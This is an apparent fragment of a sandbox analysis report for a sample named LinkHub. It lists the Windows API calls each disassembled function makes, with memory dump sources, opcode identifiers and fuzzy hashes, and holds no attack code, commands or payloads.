                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 585859e6e65d16209aa95ffc1b279a61a5a5283e11845bb630e86bea4b48067c
                                                                    • Instruction ID: 623b110cb8714f988c6af1baa5cf88fd3d766d9fc8bb4df39761fac0087ec2dc
                                                                    • Opcode Fuzzy Hash: 585859e6e65d16209aa95ffc1b279a61a5a5283e11845bb630e86bea4b48067c
                                                                    • Instruction Fuzzy Hash: 88112331260208BFEF216F65CC06FEB37A9EF89B24F110126FA50E21A0C271DC209B20
                                                                    APIs
                                                                      • Part of subcall function 00248577: _wcslen.LIBCMT ref: 0024858A
                                                                      • Part of subcall function 002A36F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 002A3712
                                                                      • Part of subcall function 002A36F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 002A3723
                                                                      • Part of subcall function 002A36F4: GetCurrentThreadId.KERNEL32 ref: 002A372A
                                                                      • Part of subcall function 002A36F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 002A3731
                                                                    • GetFocus.USER32 ref: 002A38C4
                                                                      • Part of subcall function 002A373B: GetParent.USER32(00000000), ref: 002A3746
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 002A390F
                                                                    • EnumChildWindows.USER32(?,002A3987), ref: 002A3937
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 1272988791-1110647743
                                                                    • Opcode ID: e91c7dc88f21f7255473d433e17117959fac3ed89aab8d135992beca36ed7f85
                                                                    • Instruction ID: a6d271208f74b7d179903ea8da2b6431aebfbc9d66fdfbfbcd82ccbb6e7f871b
                                                                    • Opcode Fuzzy Hash: e91c7dc88f21f7255473d433e17117959fac3ed89aab8d135992beca36ed7f85
                                                                    • Instruction Fuzzy Hash: E011A571A20206ABCF11BF749C86AEE77699F95304F048066F9099B292DF7099258F60
                                                                    APIs
                                                                    • DeleteObject.GDI32(?), ref: 00245A34
                                                                    • DestroyWindow.USER32(?,002437B8,?,?,?,?,?,00243709,?,?), ref: 00245A91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyObjectWindow
                                                                    • String ID: <)1$<)1
                                                                    • API String ID: 2587070983-1509191388
                                                                    • Opcode ID: 0df2b6da8946f73dade33746e3f24d025cebcf84d0036c7ec3c287e644db9c23
                                                                    • Instruction ID: a74114e0ac568108e790367074cd5c456b9352b8cafeb735895c788e047de0df
                                                                    • Opcode Fuzzy Hash: 0df2b6da8946f73dade33746e3f24d025cebcf84d0036c7ec3c287e644db9c23
                                                                    • Instruction Fuzzy Hash: 7B21DE34626A62CFDB1EEF1DE894BA633E8BB58311F048159F4429B262CB749C74CF45
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002D6360
                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002D638D
                                                                    • DrawMenuBar.USER32(?), ref: 002D639C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw
                                                                    • String ID: 0
                                                                    • API String ID: 3227129158-4108050209
                                                                    • Opcode ID: 2aec57a78e2577d2e18b0d98c542d1332ec50297ac326840b0dde9f3d653f8e1
                                                                    • Instruction ID: 7c87c75daf578711fe4b1486ee2dd451c22e560b69f02080bd100e7269056746
                                                                    • Opcode Fuzzy Hash: 2aec57a78e2577d2e18b0d98c542d1332ec50297ac326840b0dde9f3d653f8e1
                                                                    • Instruction Fuzzy Hash: 7B01C031524218AFDB509F10EC88BAE7BB8FF46750F1080DAE849D6250CB708EA0EF20
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,003128E0,002DAD55,000000FC,?,00000000,00000000,?), ref: 002D823F
                                                                    • GetFocus.USER32 ref: 002D8247
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                      • Part of subcall function 00242234: GetWindowLongW.USER32(?,000000EB), ref: 00242242
                                                                    • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 002D82B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                                    • String ID: (1
                                                                    • API String ID: 3601265619-3903994380
                                                                    • Opcode ID: 4025e4993e8c39ba9655dc07c23fccc687e87d202e960e6510a15b2781226aae
                                                                    • Instruction ID: 32a29cd4d08703a571804454de46d91cf02d23564cea436e3af29bd4d3f7c239
                                                                    • Opcode Fuzzy Hash: 4025e4993e8c39ba9655dc07c23fccc687e87d202e960e6510a15b2781226aae
                                                                    • Instruction Fuzzy Hash: 4D017531602941CFC319DF78D858AA633EAEB89320F14415AE816873A4CB316C67CB50
                                                                    APIs
                                                                    • DestroyAcceleratorTable.USER32(?), ref: 002D8576
                                                                    • CreateAcceleratorTableW.USER32(00000000,?,?,?,002BBE96,00000000,00000000,?,00000001,00000002), ref: 002D858C
                                                                    • GetForegroundWindow.USER32(?,002BBE96,00000000,00000000,?,00000001,00000002), ref: 002D8595
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                    • String ID: (1
                                                                    • API String ID: 986409557-3903994380
                                                                    • Opcode ID: 376e5f5c94cb5ee636d0c7b823234e34e24fc4b05d9afd0ba2bf87aeabfd8ddc
                                                                    • Instruction ID: 5b6a3e1ffa96850d2bac33e74b97ffafbe559baebfa1a8e158d4c7839af7f3ac
                                                                    • Opcode Fuzzy Hash: 376e5f5c94cb5ee636d0c7b823234e34e24fc4b05d9afd0ba2bf87aeabfd8ddc
                                                                    • Instruction Fuzzy Hash: C5011730611745DFCB259F69EC88AA677A9FB08321F51861AE552963B0DB30ADB4CB40
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00314038,0031407C), ref: 002D8C1A
                                                                    • CloseHandle.KERNEL32 ref: 002D8C2C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateHandleProcess
                                                                    • String ID: 8@1$|@1
                                                                    • API String ID: 3712363035-1189431667
                                                                    • Opcode ID: 273953db653bde993a766af79877f437065ab43c6c157d158db6b338a2851791
                                                                    • Instruction ID: 557fc6a276bcbc7effab5d82ee9f7c1eb4cdac355fea112c33ebdf77a6121e05
                                                                    • Opcode Fuzzy Hash: 273953db653bde993a766af79877f437065ab43c6c157d158db6b338a2851791
                                                                    • Instruction Fuzzy Hash: E0F05EB2591704BEE3116B62AC49FB77E5CEB0D351F004022BB08D61A1E6754C6487B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e68497e68b0203e164d0aa2a6f1b2aed47ca483501a18c22398be2befeddb226
                                                                    • Instruction ID: 210185ed5b84bed28776a9d0f1481eceb471c10bb528fc7c4ae352498477bf61
                                                                    • Opcode Fuzzy Hash: e68497e68b0203e164d0aa2a6f1b2aed47ca483501a18c22398be2befeddb226
                                                                    • Instruction Fuzzy Hash: 09C18975A1020AEFDB04CF94C884EAEB7B5FF49718F208599E505EB251DB70EE91CB90
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: __alldvrm$_strrchr
                                                                    • String ID:
                                                                    • API String ID: 1036877536-0
                                                                    • Opcode ID: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                    • Instruction ID: 87d50bc1b7ccd9ee91cbb669f764c2b224e9c2d92162ad1b23cd290f82dcb399
                                                                    • Opcode Fuzzy Hash: 6b642ec63ff6d3c82f2208d2655f2e81e391796f6f1882e4d3dcf0040d879e3b
                                                                    • Instruction Fuzzy Hash: 96A16C719203869FDB11EF18C8917AEBBE5EF11314F24C1ADE99D9B282C3749D61CB50
                                                                    APIs
                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,002E0BD4,?), ref: 002A0EE0
                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,002E0BD4,?), ref: 002A0EF8
                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,002DDCE0,000000FF,?,00000000,00000800,00000000,?,002E0BD4,?), ref: 002A0F1D
                                                                    • _memcmp.LIBVCRUNTIME ref: 002A0F3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                    • String ID:
                                                                    • API String ID: 314563124-0
                                                                    • Opcode ID: d91a093330d02280645949a8f64891e26ef9183526226809908e7ce2512606fa
                                                                    • Instruction ID: 121ffd66d7ffc41d044e1bb46132ccc2ec1bd0f14f5c4d5762e1c55c6fcb6c6a
                                                                    • Opcode Fuzzy Hash: d91a093330d02280645949a8f64891e26ef9183526226809908e7ce2512606fa
                                                                    • Instruction Fuzzy Hash: CC810871A1010AEFCB14DF94C984EEEB7B9FF89315F204599E506EB250DB71AE06CB60
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 002CB10C
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 002CB11A
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 002CB1FC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CB20B
                                                                      • Part of subcall function 0025E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00284D73,?), ref: 0025E395
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1991900642-0
                                                                    • Opcode ID: 58889bef812baa023aef2400cbcaa60119b49e14c63b0229fd72e2e35856e351
                                                                    • Instruction ID: c3dcb4a7fcca7b46344e0ba12e589d85978e45f7603da101704ac97653a4d0f7
                                                                    • Opcode Fuzzy Hash: 58889bef812baa023aef2400cbcaa60119b49e14c63b0229fd72e2e35856e351
                                                                    • Instruction Fuzzy Hash: 8A516AB1918300AFD315EF24C886A5BBBE8FF89754F00492DF98997291EB70D914CF92
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 329406eed3dc87c6ab8c649d6ff7f837447ad5b22fbc48e5606ad851cc4f23c0
                                                                    • Instruction ID: a73fcdc40c72d11c2a98bd39374d1034ac82b9b63e3789f46d5fe928b72c1069
                                                                    • Opcode Fuzzy Hash: 329406eed3dc87c6ab8c649d6ff7f837447ad5b22fbc48e5606ad851cc4f23c0
                                                                    • Instruction Fuzzy Hash: E5412839A32101ABFB247EBDDC47A6E7AACEF45330F148229F428D61D1D77548B24B61
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 002C255A
                                                                    • WSAGetLastError.WSOCK32 ref: 002C2568
                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C25E7
                                                                    • WSAGetLastError.WSOCK32 ref: 002C25F1
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$socket
                                                                    • String ID:
                                                                    • API String ID: 1881357543-0
                                                                    • Opcode ID: 075485154a9126ec0e13b75c626c62352590bdbf7a45a9fec20e03fd924e499b
                                                                    • Instruction ID: 372489b7f402e14ae92d075bcc971b1d875104ee2594d06bd6c16e6f1cb571cb
                                                                    • Opcode Fuzzy Hash: 075485154a9126ec0e13b75c626c62352590bdbf7a45a9fec20e03fd924e499b
                                                                    • Instruction Fuzzy Hash: 5641D374A10201AFE725AF24C886F2A77E5EB04758F54C54CF9159F2D2CB72ED62CB90
                                                                    APIs
                                                                    • GetWindowRect.USER32(?,?), ref: 002D6D1A
                                                                    • ScreenToClient.USER32(?,?), ref: 002D6D4D
                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 002D6DBA
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientMoveRectScreen
                                                                    • String ID:
                                                                    • API String ID: 3880355969-0
                                                                    • Opcode ID: 4c4cd2244ff511cb11442d7d11d67eee38eeef1000094e53374191471d413607
                                                                    • Instruction ID: df477c7e4adcedf33e6cde987486c71767f26c9b180b491c1f4c4aede73cf474
                                                                    • Opcode Fuzzy Hash: 4c4cd2244ff511cb11442d7d11d67eee38eeef1000094e53374191471d413607
                                                                    • Instruction Fuzzy Hash: E5512D74A10209EFCF24DF68D8849AE7BB6FF58320F20815AF9559B390D730ADA1CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6883bb34db014b7c525e6b3bedc8d747927f26fe842776b7132f84daeca325e2
                                                                    • Instruction ID: b34b2dfea691315e5b3d53d01c615d02d2994f3e294a9dd7b77519390f95bc67
                                                                    • Opcode Fuzzy Hash: 6883bb34db014b7c525e6b3bedc8d747927f26fe842776b7132f84daeca325e2
                                                                    • Instruction Fuzzy Hash: 4E412B75A20704EFD725AF78CC41B6ABBECEB84710F10C52EF015DB291D37199218B80
                                                                    APIs
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002B61C8
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 002B61EE
                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002B6213
                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002B623F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 3321077145-0
                                                                    • Opcode ID: f4b337e317635b06a6a5203d9a5e5901b5af65af942db264f440e90ce031a8fd
                                                                    • Instruction ID: 60da2f71d74cca52e3fa0240c053e5c319744f4a030f90a779decf857a8818c2
                                                                    • Opcode Fuzzy Hash: f4b337e317635b06a6a5203d9a5e5901b5af65af942db264f440e90ce031a8fd
                                                                    • Instruction Fuzzy Hash: C7414A35620611DFDB15EF14C589A5EBBE2EF89310B198488ED4A9B362CB34FC11CF91
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 002AB473
                                                                    • SetKeyboardState.USER32(00000080), ref: 002AB48F
                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 002AB4FD
                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 002AB54F
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: 2998ff75f8db2ad27cf7532a434bcc8f2f980b8a9211a27f641557f9b8245a8c
                                                                    • Instruction ID: 6f278b1cddf1994283d61079655dcf3b158abadc79d25558be0230acbae5cef2
                                                                    • Opcode Fuzzy Hash: 2998ff75f8db2ad27cf7532a434bcc8f2f980b8a9211a27f641557f9b8245a8c
                                                                    • Instruction Fuzzy Hash: 18317970E606096FFF328F2498187FA7BB5AF4B310F44421AE091461D3CB758DA5CBA1
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 002AB5B8
                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 002AB5D4
                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 002AB63B
                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 002AB68D
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
